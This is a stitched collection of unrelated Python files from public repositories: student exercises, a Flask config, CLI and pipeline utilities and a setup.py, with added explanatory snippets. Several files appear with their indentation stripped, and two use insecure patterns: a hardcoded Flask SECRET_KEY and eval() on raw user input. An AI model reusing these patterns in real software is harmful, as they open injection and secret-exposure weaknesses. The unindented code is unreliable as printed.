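    def listen(self):
        # A real driver would start a web server here.
        return "listening with %s" % self._conf["port"]

driver = EchoDriver({"port": 8080}, manager=None)
print(driver.listen())   # listening with 8080
```

Instantiating `ToyTransportDriver` directly raises `TypeError`, which is the point of marking `listen` abstract.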
# === File: Week 5: Tuples, for loop, Lists/5 (31).py | repo: MLunov/Python-programming-basics-HSE | license: MIT ===
s = list(map(int, input().split()))
for i in range(1, len(s), 2):
s[i - 1], s[i] = s[i], s[i - 1]
print(*s)
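Restated as a non-interactive function with a fixed input, the pairwise swap above behaves like this:

```python
def swap_adjacent(values):
    """Swap each pair of neighbours; a trailing element in odd-length input stays put."""
    out = list(values)
    for i in range(1, len(out), 2):
        out[i - 1], out[i] = out[i], out[i - 1]
    return out

print(swap_adjacent([1, 2, 3, 4, 5]))   # [2, 1, 4, 3, 5]
```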
# === File: Movie-REST-API/movie_api/config.py | repo: ChidinmaKO/Volta | license: MIT ===
import os
class Config:
''' Set Flask configuration variables '''
# general
SECRET_KEY = 'yadayadayada'
# database
SQLALCHEMY_DATABASE_URI = 'sqlite:///data.db'
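Flask consumes a class like this via `app.config.from_object`, which keeps only the upper-case attributes. A small stand-alone sketch of that behavior (the `from_object` helper here is illustrative, not Flask's implementation; the class is restated so the example runs on its own):

```python
class Config:
    ''' Set Flask configuration variables '''
    SECRET_KEY = 'yadayadayada'
    SQLALCHEMY_DATABASE_URI = 'sqlite:///data.db'

def from_object(obj):
    # Keep only UPPER_CASE attributes, as Flask's config loader does.
    return {k: getattr(obj, k) for k in dir(obj) if k.isupper()}

settings = from_object(Config)
print(settings['SECRET_KEY'])               # yadayadayada
print(settings['SQLALCHEMY_DATABASE_URI'])  # sqlite:///data.db
```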
# === File: kmexpert/base/blocks.py | repo: Kaminario/kmexpert | license: Apache-2.0 ===
#
# (c) 2019 Kaminario Technologies, Ltd.
#
# This software is licensed solely under the terms of the Apache 2.0 license,
# the text of which is available at http://www.apache.org/licenses/LICENSE-2.0.
# All disclaimers and limitations of liability set forth in the Apache 2.0 license apply.
#
import click
from kmexpert.base.prompt_validators import InputValidator
class Notification(object):
def __init__(self, message):
self._message = message
def run(self):
click.echo(" %s" % self._message.replace('\n', '\n '))
class ProcedureStartNotification(object):
def __init__(self, procedure):
self._procedure = procedure
def run(self):
return Notification(self._procedure.name()).run()
class PromptBase(object):
def __init__(self, msg, validator, handler):
self._msg = msg
self._handler = handler
self._validator = validator
self._prompt_res = None
def run(self):
return NotImplemented
def res(self):
"""the result is valid only after running the prompt"""
return self._prompt_res
def history(self):
"""history results are valid only after running the prompt"""
return "%(msg)s: %(res)s" % {'msg': self._msg,
'res': click.style("%s" % self._prompt_res, fg='green')}
class Prompt(PromptBase):
"""Loop until a legal response received"""
def __init__(self, msg, handler):
# type: (str, InputHandler) -> Prompt
super(Prompt, self).__init__(msg=msg,
validator=InputValidator(handler.input_converters()),
handler=handler)
def run(self):
text = click.style(self._msg, fg='green')
while True:
prompt_res = click.prompt(text=text, type=self._validator)
try:
self._prompt_res = self._handler.handle(prompt_res)
return self._prompt_res
except NotImplementedError:
continue
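The retry loop in `Prompt.run` can be exercised without `click` by scripting the input handler; `ScriptedHandler` and `run_prompt` below are illustrative stand-ins, not part of kmexpert:

```python
class ScriptedHandler:
    """Stand-in for the InputHandler used above: None answers mean 'not handled'."""
    def __init__(self, answers):
        self._answers = iter(answers)

    def handle(self, raw):
        answer = next(self._answers)
        if answer is None:
            raise NotImplementedError   # same signal Prompt.run retries on
        return answer

def run_prompt(handler, raw_inputs):
    # Mirrors Prompt.run without click: keep asking until handle() accepts.
    for raw in raw_inputs:
        try:
            return handler.handle(raw)
        except NotImplementedError:
            continue
    return None

handler = ScriptedHandler([None, "yes"])
print(run_prompt(handler, ["first try", "second try"]))   # yes
```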
# === File: 1stSemester_PythonCourse/work5/E06_1827406005.py | repo: chenyz2000/schoolCourses | license: MIT ===
a, n = eval(input('please input a, n'))
s = 0
for i in range(1, n+1):
x = int('{}'.format(a)*i)
s += x
print(s)
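Rewritten as a function with a fixed input instead of `eval(input(...))`, the digit-repetition sum works like this:

```python
def repeated_digit_sum(a, n):
    """Compute a + aa + aaa + ... up to n repetitions of the digit a."""
    total = 0
    for i in range(1, n + 1):
        total += int('{}'.format(a) * i)
    return total

print(repeated_digit_sum(5, 3))   # 5 + 55 + 555 = 615
```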
# === File: maths/maths1.py | repo: Brannydonowt/PythonBasics | license: MIT ===
# .py file for python maths exercises
# convert degree to radian
# x * pi/180
# in = 15
# out = 0.2619047619047619
def deg2rad(degrees):
pi = 22/7
return degrees * pi / 180
# convert radian to degree
# in = .52
# out = 29.781818181818185
def rad2deg(rad):
pi = 22/7
return rad / pi * 180
# area of trapezoid
# a = ((a+b)/2)h
# in = h: 5, a: 5, b: 6
# out = 27.5
def area_of_trapezoid(a, b, h):
ab = a + b
return (ab / 2) * h
# area of parallelogram
# a = bh
# in = b: 5, h: 6
def area_of_parallelogram(b, h):
return b*h
# surface volume and surface area of cylinder
# a = 2(pi)rh + 2(pi)r^2
# v = (pi)r^2h
# in = h: 4, r: 6
# out a = 377.1428571428571
# out v = 452.57142857142856
def get_volume_surface_of_cylinder(r, h):
pi = 22/7
a = (2 *pi) * r * h + (2 * pi) * (r * r)
print(a)
v = pi * (r * r) * h
print (v)
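A quick self-contained check of two of the formulas above; the functions are restated here so the example runs on its own:

```python
def deg2rad(degrees):
    pi = 22 / 7          # same approximation the file uses
    return degrees * pi / 180

def area_of_trapezoid(a, b, h):
    return ((a + b) / 2) * h

print(deg2rad(15))                 # roughly 0.2619047619, matching the comment above
print(area_of_trapezoid(5, 6, 5))  # 27.5
```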
# === File: torchsar/sharing/gain_compensation.py | repo: aisari/torchsar | license: Apache-2.0 ===
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2020-03-23 19:28:33
# @Author : Yan Liu & Zhi Liu (zhiliu.mind@gmail.com)
# @Link : http://iridescent.ink
# @Version : $1.0$
from __future__ import division, print_function, absolute_import
import torch as th
from torchsar.utils.const import *
def vga_gain_compensation(S, V, mod='linear', fact=1.0):
r"""vga gain compensation
vga gain compensation
.. math::
\begin{aligned}
{\bm F} &= \lambda \, 10^{{\bm V}/20}\\
{\bm S}_{c} &= {\bm F} \odot {\bm S}
\end{aligned}
Parameters
----------
S : torch tensor
:attr:`S` is an :math:`N_a×N_r×2` array, where, :math:`S[:,:,0]` is the I signal
and :math:`S[:,:,1]` is the Q signal.
V : torch tensor
:attr:`S` is an :math:`N_a×N_r` or :math:`N_a×1` VGA gain array, the gain values are in
``dB`` unit.
mod : str, optional
compensation mode (the default is 'linear')
fact : number, optional
fact is the factor :math:`\lambda` (the default is 1.0)
Returns
-------
torch tensor
compensated signal, :math:`N_a×N_r×2` array.
"""
raise TypeError('Not opened yet!')
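Since the body is closed (`Not opened yet!`), here is a hedged pure-Python sketch of the documented math, applied to a single (I, Q) sample rather than an N_a x N_r x 2 torch tensor; the function names and the scalar shape are assumptions made for illustration:

```python
def vga_gain_factor(v_db, fact=1.0):
    # F = fact * 10**(V/20): converts a VGA gain in dB to a linear factor.
    return fact * 10.0 ** (v_db / 20.0)

def compensate(iq, v_db, fact=1.0):
    """Apply Sc = F * S to one (I, Q) pair."""
    f = vga_gain_factor(v_db, fact)
    return (iq[0] * f, iq[1] * f)

print(vga_gain_factor(20.0))         # 10.0
print(compensate((1.0, 2.0), 20.0))  # (10.0, 20.0)
```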
# === File: tfx/orchestration/pipeline.py | repo: ashahba/tfx | license: Apache-2.0 ===
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Definition and related classes for TFX pipeline."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import functools
class PipelineDecorator(object):
"""Pipeline decorator that has pipeline-level specification."""
def __init__(self, **kwargs):
self._pipeline = self._new_pipeline(**kwargs)
# TODO(b/126411144): Come up with a better style to construct TFX pipeline.
def __call__(self, func):
@functools.wraps(func)
def decorated():
self._pipeline.components = func()
return self._pipeline
return decorated
def _new_pipeline(self, **kwargs):
return Pipeline(**kwargs)
class Pipeline(object):
"""Logical TFX pipeline object.
Args: kwargs that will be used to create real pipeline implementation.
Attributes:
pipeline_args: kwargs used to create real pipeline implementation. This is
forwarded to PipelineRunners instead of consumed in this class. This
should include:
- pipeline_name: Required. The unique name of this pipeline.
- pipeline_root: Required. The root of the pipeline outputs.
- other args are optional.
components: logical components of this pipeline.
"""
def __init__(self, pipeline_name, pipeline_root, **kwargs):
# TODO(b/126565661): Add more documentation on this.
self.pipeline_args = kwargs
self.pipeline_args.update({
'pipeline_name': pipeline_name,
'pipeline_root': pipeline_root
})
self._components = []
@property
def components(self):
return self._components
@components.setter
def components(self, components):
self._components = components
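The decorator turns a component-producing function into a factory that returns the configured pipeline. A self-contained sketch of the same call flow, with a stand-in pipeline class and hypothetical component names (not the real TFX components):

```python
import functools


class _StubPipeline:
    """Stand-in for Pipeline above: just holds kwargs and a component list."""

    def __init__(self, **kwargs):
        self.pipeline_args = kwargs
        self.components = []


def pipeline_decorator(**kwargs):
    pipeline = _StubPipeline(**kwargs)

    def wrap(func):
        @functools.wraps(func)
        def decorated():
            pipeline.components = func()  # func returns the component list
            return pipeline
        return decorated

    return wrap


@pipeline_decorator(pipeline_name='demo', pipeline_root='/tmp/demo')
def create_pipeline():
    return ['example_gen', 'trainer']  # hypothetical component names


p = create_pipeline()
print(p.pipeline_args['pipeline_name'], p.components)  # demo ['example_gen', 'trainer']
```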
# File: dm_control/utils/containers.py | repo: dingyiming0427/dm_control | license: Apache-2.0
# Copyright 2017 The dm_control Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Container classes used in control domains."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import six
_NAME_ALREADY_EXISTS = (
"A function named {name!r} already exists in the container and "
"`allow_overriding_keys` is False.")
class TaggedTasks(collections.Mapping):
"""Maps task names to their corresponding factory functions with tags.
To store a function in a `TaggedTasks` container, we can use its `.add`
decorator:
```python
tasks = TaggedTasks()
@tasks.add('easy', 'stable')
def example_task():
...
return environment
environment_factory = tasks['example_task']
# Or to restrict to a given tag:
environment_factory = tasks.tagged('easy')['example_task']
```
"""
def __init__(self, allow_overriding_keys=False):
"""Initializes a new `TaggedTasks` container.
Args:
allow_overriding_keys: Boolean, whether `add` can override existing keys
within the container. If False (default), calling `add` multiple times
with the same function name will result in a `ValueError`.
"""
self._tasks = collections.OrderedDict()
self._tags = collections.defaultdict(dict)
self.allow_overriding_keys = allow_overriding_keys
def add(self, *tags):
"""Decorator that adds a factory function to the container with tags.
Args:
*tags: Strings specifying the tags for this function.
Returns:
The same function.
Raises:
ValueError: if a function with the same name already exists within the
container and `allow_overriding_keys` is False.
"""
def wrap(factory_func):
name = factory_func.__name__
if name in self and not self.allow_overriding_keys:
raise ValueError(_NAME_ALREADY_EXISTS.format(name=name))
self._tasks[name] = factory_func
for tag in tags:
self._tags[tag][name] = factory_func
return factory_func
return wrap
def tagged(self, *tags):
"""Returns a (possibly empty) dict of functions matching all the given tags.
Args:
*tags: Strings specifying tags to query by.
Returns:
A dict of `{name: function}` containing all the functions that are tagged
by all of the strings in `tags`.
"""
if not tags:
return {}
tags = set(tags)
if not tags.issubset(six.viewkeys(self._tags)):
return {}
names = six.viewkeys(self._tags[tags.pop()])
while tags:
names &= six.viewkeys(self._tags[tags.pop()])
return {name: self._tasks[name] for name in names}
def tags(self):
"""Returns a list of all the tags in this container."""
return list(self._tags.keys())
def __getitem__(self, k):
return self._tasks[k]
def __iter__(self):
return iter(self._tasks)
def __len__(self):
return len(self._tasks)
def __repr__(self):
return "{}({})".format(self.__class__.__name__, str(self._tasks))
# File: is_core/forms/utils.py | repo: zzuzzy/django-is-core | license: BSD-3-Clause
def add_class_name(attrs, class_name):
    class_names = attrs.get('class')
    if class_names:
        class_names = [class_names]
    else:
        class_names = []
    class_names.append(class_name)
    attrs['class'] = ' '.join(class_names)
    return attrs


class ReadonlyValue:

    def __init__(self, value, humanized_value):
        self.value = value
        self.humanized_value = humanized_value
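`add_class_name` appends to any existing `class` attribute instead of overwriting it, which is the behaviour form widgets rely on. A quick self-contained usage sketch (the helper is restated here so the example runs standalone):

```python
def add_class_name(attrs, class_name):
    # Same logic as the helper above: keep any existing class, append the new one.
    class_names = [attrs['class']] if attrs.get('class') else []
    class_names.append(class_name)
    attrs['class'] = ' '.join(class_names)
    return attrs


print(add_class_name({}, 'btn'))                   # {'class': 'btn'}
print(add_class_name({'class': 'btn'}, 'btn-lg'))  # {'class': 'btn btn-lg'}
```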
# File: cli/src/commands/modify_emails.py | repo: mikiec84/docsearch-scraper | license: MIT
import os
from os import path
import subprocess as sp

from deployer.src.emails import add, delete

from .abstract_command import AbstractCommand


def _ensure_configs_private():
    # Check the presence of configs-private or clone it.
    p = '/tmp/docsearch_deploy/scraper/deployer'
    try:
        os.makedirs(p)
    except OSError:
        pass
    old_dir = os.getcwd()
    os.chdir(p)
    if not path.isdir('private'):
        sp.call(['git', 'clone', '--depth', '1', '--branch', 'master',
                 'git@github.com:algolia/docsearch-configs-private.git',
                 'private'])
    os.chdir(old_dir)
    return p


class UpdateEmails(AbstractCommand):
    def get_name(self):
        return 'emails:update'

    def get_description(self):
        return 'Add or update contact emails'

    def get_options(self):
        return [{'name': 'configs...',
                 'description': 'name of the docsearch you want to update contact emails'}]

    def run(self, args):
        p = _ensure_configs_private()
        for config in args:
            add(config, path.join(p, 'private'))


class DeleteEmails(AbstractCommand):
    def get_name(self):
        return 'emails:delete'

    def get_description(self):
        return 'Delete contact emails'

    def get_options(self):
        return [{'name': 'configs...',
                 'description': 'name of the docsearch you want to delete contact emails'}]

    def run(self, args):
        p = _ensure_configs_private()
        for config in args:
            delete(config, path.join(p, 'private'))
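`_ensure_configs_private` uses two small patterns worth calling out: `os.makedirs` wrapped in `try/except OSError` so repeated calls are harmless (on Python 3 the same effect is `os.makedirs(p, exist_ok=True)`), and saving/restoring the working directory around the clone. A self-contained sketch of the idempotent-mkdir part, using a temporary directory instead of the hard-coded `/tmp` path:

```python
import os
import tempfile


def ensure_dir(p):
    """Idempotent directory creation, as in _ensure_configs_private."""
    try:
        os.makedirs(p)
    except OSError:
        pass  # already exists: not an error for our purposes
    return p


base = tempfile.mkdtemp()
target = os.path.join(base, 'scraper', 'deployer')
ensure_dir(target)
ensure_dir(target)  # second call is a no-op instead of raising
print(os.path.isdir(target))  # True
```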
# File: setup.py | repo: random7s/python-open-controls | license: Apache-2.0
# -*- coding: utf-8 -*-
# DO NOT EDIT THIS FILE!
# This file has been autogenerated by dephell <3
# https://github.com/dephell/dephell

try:
    from setuptools import setup
except ImportError:
    from distutils.core import setup

import os.path

readme = ''
here = os.path.abspath(os.path.dirname(__file__))
readme_path = os.path.join(here, 'README.rst')
if os.path.exists(readme_path):
    with open(readme_path, 'rb') as stream:
        readme = stream.read().decode('utf8')

setup(
    long_description=readme,
    name='qctrl-open-controls',
    version='8.5.1',
    description='Q-CTRL Python Open Controls',
    python_requires='<3.10,>=3.7',
    project_urls={"documentation": "https://docs.q-ctrl.com/open-controls/references/qctrl-open-controls/", "homepage": "https://q-ctrl.com", "repository": "https://github.com/qctrl/python-open-controls"},
    author='Q-CTRL',
    author_email='support@q-ctrl.com',
    license='Apache-2.0',
    keywords='q-ctrl qctrl quantum control',
    classifiers=['Development Status :: 5 - Production/Stable', 'Environment :: Console', 'Intended Audience :: Developers', 'Intended Audience :: Education', 'Intended Audience :: Science/Research', 'Natural Language :: English', 'Operating System :: OS Independent', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Programming Language :: Python :: 3.9', 'Topic :: Internet :: WWW/HTTP', 'Topic :: Scientific/Engineering :: Physics', 'Topic :: Scientific/Engineering :: Visualization', 'Topic :: Software Development :: Embedded Systems', 'Topic :: System :: Distributed Computing'],
    packages=['qctrlopencontrols', 'qctrlopencontrols.driven_controls', 'qctrlopencontrols.dynamic_decoupling_sequences'],
    package_dir={"": "."},
    package_data={},
    install_requires=['numpy==1.*,>=1.16.0', 'toml==0.*,>=0.10.0'],
    extras_require={"dev": ["black==20.*,>=20.8.0.b1", "isort==5.*,>=5.7.0", "mypy==0.*,>=0.800.0", "nbval==0.*,>=0.9.5", "pre-commit==2.*,>=2.9.3", "pylint==2.*,>=2.6.0", "pylint-runner==0.*,>=0.5.4", "pytest==5.*,>=5.0.0", "qctrl-visualizer==2.*,>=2.12.2", "sphinx==3.*,>=3.2.1", "sphinx-rtd-theme==0.*,>=0.4.3"]},
)